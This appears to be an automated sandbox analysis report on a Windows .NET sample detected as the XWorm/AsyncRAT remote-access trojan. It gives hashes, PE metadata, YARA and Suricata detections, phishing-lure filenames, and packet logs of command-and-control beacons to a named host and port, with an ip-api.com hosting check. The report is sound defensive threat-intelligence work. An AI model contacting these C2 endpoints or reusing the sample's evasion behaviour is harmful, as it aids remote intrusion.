                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: Rejected Shipping Documents compiled PL pdf.exe, Detection: malicious, Browse
                                                            • Filename: Public Holiday mem_Notice 2024.exe, Detection: malicious, Browse
                                                            • Filename: D65youPyf5.exe, Detection: malicious, Browse
                                                            • Filename: 81WOMYtzK3.exe, Detection: malicious, Browse
                                                            • Filename: AN.exe, Detection: malicious, Browse
                                                            • Filename: FW CMA SHZ Freight invoice CHN1080769.exe, Detection: malicious, Browse
                                                            • Filename: jC48ka41YM.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.11842.7473.exe, Detection: malicious, Browse
                                                            • Filename: Shipping Documents Cos090224.exe, Detection: malicious, Browse
                                                            • Filename: 7f3N7x1Rty.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                            \Device\ConDrv

                                                            Download File
                                                            Process:C:\Users\user\XClient.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1141
                                                            Entropy (8bit):4.442398121585593
                                                            Encrypted:false
                                                            SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                            MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                            SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                            SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                            SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                            Malicious:false
                                                            Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):5.7826539793370255
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:80c619d931fa4e5c89fe87aac0b6b143.exe
                                                            File size:888'320 bytes
                                                            MD5:5957ab676b59da646ea6c4d1b18f4381
                                                            SHA1:c942211d7fe7371eced4269b707a846c7c4db3a7
                                                            SHA256:19aa0b7f9763b6905a2c22a19b6917cf40aa247af440949db580585722199d12
                                                            SHA512:9bd95860245847cfdbd406d8e5580c6aa656104cdad0c389f30e648b274c76e90c91f6c9d4842df5847e41984e81a1318969f426e821940cf243f68873bda51f
                                                            SSDEEP:12288:r5r720b0t9RMGYDJpEuGz4p0L0QZJ4ek8Ls6k0s8aPbUtavjohAn+NG+8nbGEkYG:dP204tpYDJwkpiHek6DfOhp
                                                            TLSH:6015D7243EEB616DF173DE359FE47DA19E2EFA632707A54F104303CA4A06A82DE90175
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f................................. ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4da2be
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x66DEA740 [Mon Sep 9 07:44:00 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xda2700x4b.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xdc0000x5a8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xd82c40xd8400c6e91062e59cf0e7a4c9b22543553c6cFalse0.4685795249277457data5.787432927220896IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xdc0000x5a80x6009e668320cb0ab7bd841606b0749d830fFalse0.4270833333333333data4.109443032710629IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xde0000xc0x200d08bc7a8732a073099e9878f0530dfe7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xdc0a00x318data0.44696969696969696
                                                            RT_MANIFEST0xdc3b80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-09-09T17:29:55.974702+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549720147.185.221.1726501TCP
                                                            2024-09-09T17:32:00.021865+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549725147.185.221.1726501TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 9, 2024 17:27:59.555258989 CEST4970480192.168.2.5208.95.112.1
                                                            Sep 9, 2024 17:27:59.560790062 CEST8049704208.95.112.1192.168.2.5
                                                            Sep 9, 2024 17:27:59.560866117 CEST4970480192.168.2.5208.95.112.1
                                                            Sep 9, 2024 17:27:59.565112114 CEST4970480192.168.2.5208.95.112.1
                                                            Sep 9, 2024 17:27:59.570843935 CEST8049704208.95.112.1192.168.2.5
                                                            Sep 9, 2024 17:28:00.039277077 CEST8049704208.95.112.1192.168.2.5
                                                            Sep 9, 2024 17:28:00.083487034 CEST4970480192.168.2.5208.95.112.1
                                                            Sep 9, 2024 17:28:19.526715994 CEST4971326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:19.533324003 CEST2650149713147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:28:19.533411980 CEST4971326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:19.574222088 CEST4971326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:19.580869913 CEST2650149713147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:28:30.595359087 CEST4971326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:30.600338936 CEST2650149713147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:28:40.904038906 CEST2650149713147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:28:40.904181004 CEST4971326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:41.714694977 CEST4971326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:41.718589067 CEST4971426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:41.719775915 CEST2650149713147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:28:41.723470926 CEST2650149714147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:28:41.723542929 CEST4971426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:41.773292065 CEST4971426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:41.778263092 CEST2650149714147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:28:53.709072113 CEST4971426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:54.021328926 CEST4971426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:28:54.139508963 CEST2650149714147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:28:54.139612913 CEST2650149714147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:03.105372906 CEST2650149714147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:03.105485916 CEST4971426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:04.115160942 CEST4971426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:04.116436005 CEST4971726501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:04.120141029 CEST2650149714147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:04.121326923 CEST2650149717147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:04.121395111 CEST4971726501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:04.151171923 CEST4971726501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:04.156022072 CEST2650149717147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:16.927826881 CEST4971726501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:16.935678005 CEST2650149717147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:22.975121021 CEST4971726501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:23.289947033 CEST4971726501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:23.708120108 CEST2650149717147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:23.708134890 CEST2650149717147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:25.498585939 CEST2650149717147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:25.498660088 CEST4971726501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:28.474657059 CEST4971726501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:28.477638006 CEST4971926501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:28.479686975 CEST2650149717147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:28.482671022 CEST2650149719147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:28.482888937 CEST4971926501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:28.628251076 CEST4971926501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:28.633189917 CEST2650149719147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:30.551651001 CEST8049704208.95.112.1192.168.2.5
                                                            Sep 9, 2024 17:29:30.552244902 CEST4970480192.168.2.5208.95.112.1
                                                            Sep 9, 2024 17:29:37.474765062 CEST4971926501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:37.480109930 CEST2650149719147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:40.052844048 CEST4970480192.168.2.5208.95.112.1
                                                            Sep 9, 2024 17:29:40.059310913 CEST8049704208.95.112.1192.168.2.5
                                                            Sep 9, 2024 17:29:49.677767038 CEST4971926501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:49.682775974 CEST2650149719147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:49.854680061 CEST2650149719147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:49.854773045 CEST4971926501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:54.679742098 CEST4971926501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:54.681431055 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:54.684751034 CEST2650149719147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:54.686373949 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:54.687289000 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:54.862246990 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:54.867264032 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:55.974701881 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:55.980531931 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:29:58.553235054 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:29:58.558212996 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:01.256022930 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:01.261141062 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:04.943625927 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:04.952718019 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:05.146661043 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:05.152014017 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:06.255939960 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:06.262808084 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:06.334352970 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:06.339446068 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:15.912246943 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:16.069075108 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:16.079613924 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:16.083908081 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:20.959999084 CEST4972026501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:20.962369919 CEST4972126501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:20.965382099 CEST2650149720147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:20.968442917 CEST2650149721147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:20.968565941 CEST4972126501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:21.049173117 CEST4972126501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:21.066854000 CEST2650149721147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:21.131170034 CEST4972126501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:21.136234045 CEST2650149721147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:25.647242069 CEST4972126501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:25.652503967 CEST2650149721147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:31.396936893 CEST4972126501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:31.401988983 CEST2650149721147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:42.326230049 CEST2650149721147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:42.326406956 CEST4972126501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:46.741817951 CEST4972126501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:46.743345022 CEST4972226501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:46.747145891 CEST2650149721147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:46.748217106 CEST2650149722147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:46.751076937 CEST4972226501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:46.900502920 CEST4972226501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:46.905395985 CEST2650149722147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:48.087945938 CEST4972226501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:48.092976093 CEST2650149722147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:30:50.693562031 CEST4972226501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:30:50.699510098 CEST2650149722147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:04.615438938 CEST4972226501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:04.620526075 CEST2650149722147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:08.106180906 CEST2650149722147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:08.106283903 CEST4972226501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:12.631118059 CEST4972226501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:12.635788918 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:12.636092901 CEST2650149722147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:12.640826941 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:12.643403053 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:12.832093954 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:12.837646008 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:15.974822044 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:15.982523918 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:23.178096056 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:23.183049917 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:23.224848032 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:23.231211901 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:23.271617889 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:23.276748896 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:23.318545103 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:23.323381901 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:34.016175032 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:34.016241074 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:38.495089054 CEST4972326501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:38.495093107 CEST4972426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:38.500204086 CEST2650149723147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:38.500224113 CEST2650149724147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:38.503418922 CEST4972426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:38.660255909 CEST4972426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:38.665186882 CEST2650149724147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:43.943953991 CEST4972426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:43.949050903 CEST2650149724147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:54.318973064 CEST4972426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:54.324723005 CEST2650149724147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:58.663144112 CEST4972426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:58.668217897 CEST2650149724147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:59.892699003 CEST2650149724147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:59.892755032 CEST4972426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:59.895667076 CEST4972426501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:59.898009062 CEST4972526501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:59.900871038 CEST2650149724147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:59.903481960 CEST2650149725147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:31:59.903563976 CEST4972526501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:59.943932056 CEST4972526501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:31:59.949696064 CEST2650149725147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:32:00.021864891 CEST4972526501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:32:00.026793957 CEST2650149725147.185.221.17192.168.2.5
                                                            Sep 9, 2024 17:32:04.365771055 CEST4972526501192.168.2.5147.185.221.17
                                                            Sep 9, 2024 17:32:04.370985031 CEST2650149725147.185.221.17192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 9, 2024 17:27:59.541054964 CEST6249653192.168.2.51.1.1.1
                                                            Sep 9, 2024 17:27:59.549201965 CEST53624961.1.1.1192.168.2.5
                                                            Sep 9, 2024 17:28:19.501507998 CEST5827453192.168.2.51.1.1.1
                                                            Sep 9, 2024 17:28:19.522455931 CEST53582741.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 9, 2024 17:27:59.541054964 CEST192.168.2.51.1.1.10xa380Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Sep 9, 2024 17:28:19.501507998 CEST192.168.2.51.1.1.10x3033Standard query (0)case-shield.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 9, 2024 17:27:59.549201965 CEST1.1.1.1192.168.2.50xa380No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Sep 9, 2024 17:28:19.522455931 CEST1.1.1.1192.168.2.50x3033No error (0)case-shield.gl.at.ply.gg147.185.221.17A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • ip-api.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549704208.95.112.1804956C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 9, 2024 17:27:59.565112114 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                            Host: ip-api.com
                                                            Connection: Keep-Alive
                                                            Sep 9, 2024 17:28:00.039277077 CEST174INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Sep 2024 15:27:59 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 6
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 3
                                                            X-Rl: 43
                                                            Data Raw: 66 61 6c 73 65 0a
                                                            Data Ascii: false


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:11:27:55
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exe"
                                                            Imagebase:0x4c0000
                                                            File size:888'320 bytes
                                                            MD5 hash:5957AB676B59DA646EA6C4D1B18F4381
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            General

